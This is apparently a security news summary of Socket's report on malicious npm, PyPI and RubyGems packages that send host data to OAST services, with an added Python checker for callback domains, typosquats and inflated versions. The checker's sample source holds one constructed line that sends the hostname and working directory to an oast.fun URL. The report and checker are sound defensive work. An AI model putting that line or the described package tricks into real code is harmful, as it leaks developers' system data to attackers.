Malicious Packages Weaponize OAST for Stealthy Data Exfiltration and Reconnaissance

Summary: Researchers at Socket have identified malicious campaigns that exploit Out-of-Band Application Security Testing (OAST) techniques, traditionally used for ethical hacking, to exfiltrate sensitive data and establish command-and-control channels. This misuse of OAST tools poses significant risks to developers and organizations by leveraging trusted package ecosystems like npm, PyPI, and RubyGems.

Threat Actor: Aliases “nullljs”, “drv0s”, “Tu Nombre” (malicious actors)
Victim: Developers and organizations

Key Points:

  • OAST techniques are being weaponized by threat actors to exfiltrate sensitive data and perform covert reconnaissance.
  • Malicious packages on npm, PyPI, and RubyGems are designed to trick developers and exploit trusted ecosystems.
  • Examples include high-version imposter packages, typosquatting, and DNS-based reconnaissance methods.
  • Threat actors are likely to continue exploiting OAST techniques for malicious purposes.

Researchers at Socket have uncovered a series of malicious campaigns exploiting Out-of-Band Application Security Testing (OAST) techniques. Traditionally used by ethical hackers to identify vulnerabilities, OAST is now being misused by threat actors to exfiltrate sensitive data, establish command-and-control (C2) channels, and perform covert reconnaissance.

Originally developed for ethical security assessments, OAST tools like PortSwigger’s Burp Collaborator and Project Discovery’s interact.sh provide advanced capabilities, such as DNS lookups and HTTP requests. Unfortunately, these tools are being hijacked for nefarious purposes.

“Socket’s threat research team has continually observed and identified malicious JavaScript, Python, and Ruby packages leveraging OAST services such as oastify.com and oast.fun to exfiltrate sensitive data to attacker-controlled servers,” the report states.

Real-World Examples of Weaponized OAST

  1. npm: High-Version Imposter Packages
    • Threat Actor: Alias “nullljs”
    • Malicious Package: adobe-dcapi-web
    • Tactic: An artificially high version number such as 99.99.99 tricks automated systems into resolving and downloading the malicious package as the “latest” release. The package uses obfuscated JavaScript, avoids Russian systems, and exfiltrates data via oastify.com.

    “The code adjusts its behavior based on the operating system and uses PowerShell on Windows or Bash scripts on Linux and macOS,” researchers noted.

  2. PyPI: Typosquatting for Silent Exfiltration
    • Threat Actor: Alias “drv0s”
    • Malicious Package: monoliht
    • Tactic: A single transposed letter in the package name (monoliht instead of monolith) misleads developers. Hardcoded URLs send host metadata such as the hostname and working directory to domains like oast.fun.

    “By reversing a single letter, the threat actor created a package…used to silently collect metadata,” the report explains.

  3. RubyGems: DNS-Based Reconnaissance
    • Threat Actor: Alias “Tu Nombre”
    • Malicious Packages: chauuuyhhn, nosvemosssadfsd
    • Tactic: Embedded scripts exfiltrate IP addresses, hostnames, and other host details inside DNS queries, which basic intrusion detection systems rarely inspect.

    “Since DNS traffic often appears benign to basic intrusion detection systems, this method allows the threat actor to perform initial reconnaissance with lower risk of detection,” researchers warned.
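The three package-level indicators in the cases above (references to OAST callback domains in package source, an implausibly high version number, and a name one edit away from a trusted package) can be checked mechanically before a dependency is installed. The script below is an added example and not code from Socket or from the article; the domain watchlist, the trusted-name list, the version threshold and the sample source are constructed assumptions for the demo.

```python
import re
from typing import Optional
# OAST callback domains named in the article (constructed watchlist; extend as needed).
OAST_DOMAINS = ("oastify.com", "oast.fun", "interact.sh")
OAST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)*(?:" + "|".join(map(re.escape, OAST_DOMAINS)) + r")\b", re.I)
# Trusted names a typosquat would imitate (assumption: a short demo list, not a registry).
TRUSTED_NAMES = ("monolith", "lodash", "requests")
MAX_SANE_MAJOR = 50  # heuristic threshold (assumption); 99.99.99 sits far above it

def find_oast_callbacks(source: str) -> list:
    """Return every OAST callback host referenced in the package source."""
    return sorted({m.group(0).lower() for m in OAST_RE.finditer(source)})

def suspicious_version(version: str) -> bool:
    """Flag artificially high versions (e.g. 99.99.99) meant to win 'latest' resolution."""
    major = version.split(".")[0]
    return major.isdigit() and int(major) > MAX_SANE_MAJOR

def osa_distance(a: str, b: str) -> int:
    """Edit distance counting adjacent swaps as one edit, so monoliht -> monolith is 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]

def typosquat_of(name: str) -> Optional[str]:
    """Trusted name exactly one edit away from `name`, or None if it is not a near-miss."""
    for trusted in TRUSTED_NAMES:
        if osa_distance(name.lower(), trusted) == 1:
            return trusted
    return None

def audit_package(name: str, version: str, source: str) -> dict:
    """Combine the three indicators into one finding for a package under review."""
    return {"oast_callbacks": find_oast_callbacks(source),
            "high_version": suspicious_version(version),
            "typosquat_of": typosquat_of(name)}

# Constructed sample modelled on the PyPI case: a hardcoded OAST URL receiving host metadata.
SAMPLE_SOURCE = 'URL = "http://abc123xyz.oast.fun/"\nurlopen(URL + socket.gethostname() + "/" + os.getcwd())\n'

if __name__ == "__main__":
    print(audit_package("monoliht", "99.99.99", SAMPLE_SOURCE))
```

Run as a pre-install gate or over a registry mirror, a hit on any indicator is a reason to hold the package for manual review; the DNS-based RubyGems variant needs network-side monitoring of outbound DNS rather than source inspection alone.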

The misuse of OAST techniques poses significant risks to developers and organizations worldwide. Because these malicious packages ride on trusted ecosystems like npm, PyPI, and RubyGems, and their callbacks blend into traffic that looks like legitimate security testing, they are particularly dangerous.

“Threat actors will continue to exploit the same out-of-band testing techniques for malicious purposes,” researchers caution.

Source:
https://securityonline.info/malicious-packages-weaponize-oast-for-stealthy-data-exfiltration-and-reconnaissance/